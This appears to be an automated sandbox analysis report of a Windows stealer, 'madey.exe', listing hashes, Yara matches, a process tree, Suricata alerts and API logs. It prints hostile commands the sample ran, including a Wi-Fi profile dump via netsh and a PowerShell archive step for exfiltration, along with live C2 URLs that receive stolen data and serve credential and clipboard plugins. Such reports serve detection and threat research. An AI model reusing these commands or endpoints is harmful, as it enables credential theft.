Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 16, 2024, 11:06 a.m.	Oct. 16, 2024, 11:11 a.m.

Size	549.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`689ff816fc3db38894e81abbdf63c02b`
SHA256	`f2ebbd96f7cf19aa8cc8b1273d1f80169de93ac4dde951ff4547177a11010945`
CRC32	`4E09271A`
ssdeep	`12288:MzW5JeQqp6xEWEoiH5KlCrX4FZg40rvM1BCpkLDapAGEhoCXOfNw9lu+eqQoEzwz:MzWCKlCroFWHr6BCCXau7X3pP7`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

madey.exe "C:\Users\test22\AppData\Local\Temp\madey.exe"
1708
- Gxtuum.exe "C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe"
  2204
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\0560249ade67ec\cred64.dll, Main
    2616
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\0560249ade67ec\cred64.dll, Main
      2660
      - netsh.exe netsh wlan show profiles
        2716
      - powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
        2864
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll, Main
    2968
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
78.153.139.168	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 78.153.139.168:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 78.153.139.168:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 78.153.139.168:80 -> 192.168.56.103:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 78.153.139.168:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 16, 2024, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 16, 2024, 11:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 11:06 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 16, 2024, 11:06 a.m.			0	0
IsDebuggerPresent Oct. 16, 2024, 11:06 a.m.			0	0
IsDebuggerPresent Oct. 16, 2024, 11:06 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000414b20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7d30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7d30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7fd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7b00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7ef0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7ef0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b7ef0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8510 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8510 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8580 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8580 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8510 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8510 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8510 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003f6a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003f6a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003f6a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003f6a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000048bf20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000048bf20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000048c1c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000048c1c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8350 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8350 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8350 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b0b8350 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 16, 2024, 11:06 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://78.153.139.168/gfj38cHcw/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://78.153.139.168/gfj38cHcw/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://78.153.139.168/gfj38cHcw/Plugins/clip64.dll

Performs some HTTP requests (3 events)

request	POST http://78.153.139.168/gfj38cHcw/index.php
request	GET http://78.153.139.168/gfj38cHcw/Plugins/cred64.dll
request	GET http://78.153.139.168/gfj38cHcw/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://78.153.139.168/gfj38cHcw/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 183 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 1708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ff0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 10:59 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000006530000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002490000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000025b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1de1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2060000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2060000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2060000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2060000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2060000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2061000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2061000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2061000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2061000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef205e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000025b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000025b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00122000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00123000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 11:06 a.m.	process_identifier: 2864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
